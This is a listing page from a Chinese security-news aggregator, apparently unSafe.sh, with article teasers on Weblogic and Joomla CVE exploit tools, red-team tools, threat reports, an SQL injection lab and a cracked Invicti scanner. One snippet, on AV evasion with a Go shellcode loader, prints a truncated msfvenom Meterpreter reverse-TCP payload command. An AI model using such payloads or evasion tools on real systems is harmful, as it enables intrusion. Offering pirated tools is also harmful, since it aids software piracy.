unSafe.sh - 不安全
我的收藏
今日热榜
公众号文章
导航
Github CVE
Github Tools
编码/解码
文件传输
Twitter Bot
Telegram Bot
Rss
黑夜模式
入侵检测挑战赛第四期-SQL注入
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚 规则 规则不细说 SQL注入 登录发现SQL分为两套环境,上面字符型注入、下面order by注入...
2023-2-25 14:3:6 | 阅读: 13 |
收藏
|
XG小刚
username
数据
注入
绕过
h3r3
joomla CVE-2023-23752 扫描器的简单程序
joomla CVE-2023-23752 扫描器的简单程序,这是一个简单的 Ruby 脚本,用于检查目标列表是否容易受到 CVE-2023-23752 的攻击,CVE-2023-23752 是 We...
2023-2-25 13:28:35 | 阅读: 27 |
收藏
|
Ots安全
23752
脚本
攻击
安全
gem
Weblogic Console远程代码执行漏洞-综合利用工具
CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。需要模块:requests、http.client(工具仅用于授权的安全测试,请勿用于...
2023-2-25 13:28:27 | 阅读: 34 |
收藏
|
Ots安全
beans
14882
python3
模块
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用最近做攻防演练发现了很多内网穿透的工具,其中最多的就是nps,红队老哥好像还挺喜欢这个的,真的是多,每天导出...
2023-2-25 13:28:22 | 阅读: 38 |
收藏
|
Ots安全
nps
github
weishen250
burp
伪造
Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)
CVE-2023-21839未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的介绍Weblogic CVE-2023-21839 RCE(1)无需任何 Java 依赖...
2023-2-25 13:28:17 | 阅读: 43 |
收藏
|
Ots安全
21839
weblogic
cmdgo
7001
iiop
创立龙组安全实验室
前言:昨天跟几个朋友唠嗑的时候聊到简历,发现简历已经从几年前XXAPT经验转变为XXX安全实验室核心成员。为了不让广大粉丝输在起跑线上,故创立:龙组安全实验室实验室简介:实验室主要由爱好计算机爱好者组...
2023-2-25 13:9:52 | 阅读: 16 |
收藏
|
边界骇客
安全
起跑
起跑线
骇客
ChatGPT 之父传奇:技术天才、投资狂魔、末日生存狂、下一个马斯克
近几个月,围绕 ChatGPT 的话题已经说了很多,这次让我们谈谈它的执掌人、OpenAI 首席执行官——Sam Altman。在见到他大约三分钟后,我记得当时在想「啊,这就是比尔盖茨 19 岁时的样...
2023-2-25 12:38:36 | 阅读: 7 |
收藏
|
爱范儿
altman
openai
chatgpt
斯克
马斯克
以SentinelOne的产品为例,说说eBPF在CWPP应用中的优势
eBPF(extended Berkeley Packet Filter) 可谓 Linux 社区的新宠,很多大公司都开始投身于 eBPF 技术,如 Goole、Facebook、Twitter 等。...
2023-2-25 12:3:30 | 阅读: 16 |
收藏
|
嘶吼专业版
ebpf
cwpp
模块
代理
Hydrochasma:一个前所未见的团伙攻击亚洲的医学检验所和船运公司
亚洲的多家船运公司和医学检验所近日遭到一起活动的攻击,这起可能旨在收集情报的攻击完全依赖公开可用的离地攻击(LotL)工具。这起活动背后的威胁团伙Hydrochasma与任何之前已确定身份的团伙毫无关...
2023-2-25 12:3:25 | 阅读: 13 |
收藏
|
嘶吼专业版
攻击
exehxxp
cobalt
代理
受害
先进攻防情报精选-第3期
Arctic Wolf Labs 团队公布了勒索团伙Lorenz的调查报告,揭露了一些最新的勒索TTPFortinet FortiNAC漏洞在细节被公布的几个小时内就被大规模利用IBM X-Force...
2023-2-25 11:58:51 | 阅读: 3 |
收藏
|
赛博攻防悟道
漏洞
faspex
aspera
攻击
fortinac
CFC:一种功能强大的中心化防火墙控制工具
关于CFC CFC,全称为Centralized Firewall Control,即中心化防火墙控制,该工具给广大研究人员提供了一种中心化的方法来管理运行了iptable的多台服务器或多个负载均衡...
2023-2-25 10:5:0 | 阅读: 10 |
收藏
|
FreeBuf
cfc
防火墙
cfc6
findip
dport
苹果设备发现新漏洞,可以恶意访问用户数据
苹果公司修订了它上个月发布的安全公告,更新了影响iOS、iPadOS和macOS的三个新漏洞。第一个漏洞是Crash Reporter组件中的一个竞赛条件(CVE-2023-23520),可使恶意攻击...
2023-2-25 10:4:53 | 阅读: 8 |
收藏
|
FreeBuf
漏洞
攻击者
苹果
攻击
安全
FreeBuf 周报 | MyloBot 僵尸网络正快速蔓延;普京国情咨文发布遭遇网络攻击
各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!热点资讯1. 只有付费才可使用?马斯克取消普通...
2023-2-25 10:4:43 | 阅读: 9 |
收藏
|
FreeBuf
安全
网络
漏洞
chatgpt
脚本
Gartner:25%的CISO想对安全说再见
如果企业不主动应对安全的倦怠问题,预计在未来两年内,网络安全部门将出现相当大的变动。在Gartner 于2月22日发布的一项预测显示,到2025年,将近一半的企业安全负责人将更换工作,其中 25% 完...
2023-2-25 10:4:35 | 阅读: 9 |
收藏
|
FreeBuf
安全
网络
ciso
年薪
【Android 原创】一个懒人的破解方式
作者论坛账号:低调(d-iao)何为懒?对于我来说 基本上一个版本如果好好的 我会用到烂为止都不会去更新。再则只要不影响使用 我不会去优化到极致,除非我走心了。所以今天的教学就以懒人的方式展示吧。自从...
2023-2-25 09:47:12 | 阅读: 11 |
收藏
|
吾爱破解论坛
数据
1080p
480p
破解
键名
一本书了解网络威胁检测响应的安全运营本质
读者对象安全运营、安全策略、安全开发等安全技术专业人员安全产品的研发人员、产品经理、项目管理人员等安全行业同行安全解决方案架构师、技术咨询人员等安全服务从业人员负责企业安全风险防控的安全、运维、IT人...
2023-2-25 09:34:44 | 阅读: 5 |
收藏
|
thelostworld
安全
威胁
网络
数据
模型
分享 | Go编写loader加载shellcode免杀学习
一 简单实现(1)msf生成shellcode,选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.133....
2023-2-25 09:12:33 | 阅读: 25 |
收藏
|
编码安全研究
shellcode
newproc
loader
干货|网络安全资料情报库
这是一个网安人的聚集地~为解决大多粉丝的提问,以及资源需求,特此联合几位师傅创办了知识星球;知识星球已经运营两年,内容大致为:(1)每日分享资料与工具,并进行了分类(2)创办了作业模块,偶尔发布作业与...
2023-2-25 09:12:26 | 阅读: 19 |
收藏
|
编码安全研究
给与
星主
创办
模块
合伙
推荐几款红队工具
一、CertSniffcertSniff 是用 Python 编写的证书透明度日志关键字观察器。它使用 certstream 库来监视包含在文件中定义的关键字的证书创建日志。您可以使用与您的受害域相关...
2023-2-25 09:2:31 | 阅读: 49 |
收藏
|
菜鸟学信安
feroxbuster
aort
gobuster
certsniff
证书
Invicti-standardv23-2-0破解版
最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:给公众号设为星标加入交流群”棉花糖娱乐圈圈圈“也能第一时间获得推送噢01更新介绍新的安全检查使用静态文件通过 Kid 添加...
2023-2-25 08:59:55 | 阅读: 27 |
收藏
|
棉花糖网络安全圈
漏洞
修复
条款
破解
安全
Previous
764
765
766
767
768
769
770
771
Next